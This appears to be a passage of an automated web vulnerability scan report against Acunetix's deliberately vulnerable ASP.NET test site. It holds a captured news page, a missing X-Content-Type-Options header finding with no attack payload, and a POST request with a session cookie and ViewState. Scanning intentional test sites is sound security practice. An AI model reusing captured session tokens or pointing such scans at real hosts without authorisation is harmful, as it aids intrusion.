Response Body - size: 22,875 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 422 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10937 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,937 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgI